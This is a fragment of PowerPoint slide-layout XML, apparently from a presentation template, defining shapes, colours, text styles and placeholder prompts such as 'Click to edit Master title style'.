              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="3333" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2399724596"/>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1">
  <p:cSld name="Caption 1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 417"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="Google Shape;418;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-67" y="7467"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1">
              <a:alpha val="235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9" name="Google Shape;419;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-100733" y="617733"/>
            <a:ext cx="6515200" cy="14024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0" name="Google Shape;420;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8707267" y="-819167"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">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421" name="Google Shape;421;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8999367" y="-946167"/>
            <a:ext cx="4541200" cy="44032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422" name="Google Shape;422;p55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="707633"/>
            <a:ext cx="5145200" cy="1123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333"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199280152"/>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1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 423"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="Google Shape;424;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5554133" y="3760568"/>
            <a:ext cx="10769600" cy="51676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latin typeface="Didact Gothic"/>
              <a:ea typeface="Didact Gothic"/>
              <a:cs typeface="Didact Gothic"/>
              <a:sym typeface="Didact Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="Google Shape;425;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-1342033" y="-392933"/>
            <a:ext cx="5372400" cy="2578000"/>
          </a:xfrm>
          <a:prstGeom prst="triangl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6" name="Google Shape;426;p56"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951000" y="896984"/>
            <a:ext cx="10290000" cy="1728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10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="Google Shape;427;p56"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4091000" y="2839364"/>
            <a:ext cx="4010000" cy="921200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="609585" lvl="0" indent="-423323" algn="ctr"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1219170" lvl="1" indent="-423323" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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828754" lvl="2" indent="-423323" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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2438339" lvl="3" indent="-423323" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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3047924" lvl="4" indent="-423323" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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3657509" lvl="5" indent="-423323" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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4267093" lvl="6" indent="-423323" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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4876678" lvl="7" indent="-423323" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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5486263" lvl="8" indent="-423323" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Google Shape;428;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3311400" y="4523533"/>
            <a:ext cx="5569200" cy="9212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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1467" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:rPr>
              <a:t>CREDITS: This presentation template was created by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1467" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt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467" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:rPr>
              <a:t>, including icons by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1467" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt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467" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:rPr>
              <a:t>, infographics &amp; images by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1467" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt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r>
              <a:rPr lang="en" sz="1467" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1467" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Didact Gothic"/>
              <a:ea typeface="Didact Gothic"/>
              <a:cs typeface="Didact Gothic"/>
              <a:sym typeface="Didact Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="Google Shape;429;p56"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4092233" y="2457500"/>
            <a:ext cx="4010000" cy="572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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1764449871"/>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430"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Google Shape;431;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9366000" y="3467500"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">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432" name="Google Shape;432;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9505067" y="3467500"/>
            <a:ext cx="4541200" cy="4403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433" name="Google Shape;433;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-1016567" y="-1220733"/>
            <a:ext cx="4541200" cy="4403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434" name="Google Shape;434;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-2241867" y="-2030167"/>
            <a:ext cx="7153200" cy="33552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68507680"/>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35"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Google Shape;436;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="0" y="-48267"/>
            <a:ext cx="3056800" cy="2778800"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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7" name="Google Shape;437;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8070800" y="4086433"/>
            <a:ext cx="7153200" cy="33552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50888312"/>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38"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="439" name="Google Shape;439;p59"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8466817" y="-2001500"/>
            <a:ext cx="5010000" cy="5578400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;440;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-85600" y="5101033"/>
            <a:ext cx="1728000" cy="1843200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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1" name="Google Shape;441;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7011867" y="-317233"/>
            <a:ext cx="15205200" cy="7792400"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>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2" name="Google Shape;442;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-7185400" y="-2882633"/>
            <a:ext cx="15205200" cy="7792400"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>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3" name="Google Shape;443;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948367" y="5151367"/>
            <a:ext cx="3876400" cy="19868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4" name="Google Shape;444;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1477300" y="-741433"/>
            <a:ext cx="3876400" cy="19868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67101788"/>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dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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flipH="1">
            <a:off x="2428633" y="3370167"/>
            <a:ext cx="7334800" cy="61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48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93" name="Google Shape;93;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4057800" y="2044681"/>
            <a:ext cx="4076400" cy="116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None/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Google Shape;94;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4264200" y="4390916"/>
            <a:ext cx="3663600" cy="42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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="95" name="Google Shape;95;p15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8466817" y="-2001500"/>
            <a:ext cx="5010000" cy="5578400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Google Shape;96;p15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-85600" y="5101033"/>
            <a:ext cx="1728000" cy="18432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15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7011867" y="-317233"/>
            <a:ext cx="15205200" cy="7792400"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>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15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-7185400" y="-2882633"/>
            <a:ext cx="15205200" cy="7792400"/>
          </a:xfrm>
          <a:prstGeom prst="triangl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15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948367" y="5151367"/>
            <a:ext cx="3876400" cy="19868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0" name="Google Shape;100;p15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1477300" y="-741433"/>
            <a:ext cx="3876400" cy="19868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03188928"/>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48"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1343685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5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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950967" y="2939473"/>
            <a:ext cx="5133600" cy="920800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="609585" lvl="0" indent="-423323">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marL="1219170" lvl="1" indent="-423323">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828754" lvl="2" indent="-423323">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2438339" lvl="3" indent="-423323">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3047924" lvl="4" indent="-423323">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3657509" lvl="5" indent="-423323">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4267093" lvl="6" indent="-423323">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4876678" lvl="7" indent="-423323">
              <a:spcBef>
                <a:spcPts val="2133"/>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5486263" lvl="8" indent="-423323">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Google Shape;38;p7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="1230700"/>
            <a:ext cx="5627600" cy="130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4000"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1043167420"/>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52"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35297345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56"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20205183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57"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Google Shape;458;p66"/>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038070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1073400" y="2454000"/>
            <a:ext cx="10045200" cy="195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8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14869479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accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 41"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Google Shape;42;p9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="609600"/>
            <a:ext cx="12192000" cy="6248400"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 5000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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-85900" y="85800"/>
            <a:ext cx="5657600" cy="54860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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000" flipH="1">
            <a:off x="6588933" y="35367"/>
            <a:ext cx="5819600" cy="5636800"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:pr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 name="Google Shape;45;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2254400" y="3293733"/>
            <a:ext cx="7683200" cy="93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None/>
              <a:defRPr sz="4000" b="1">
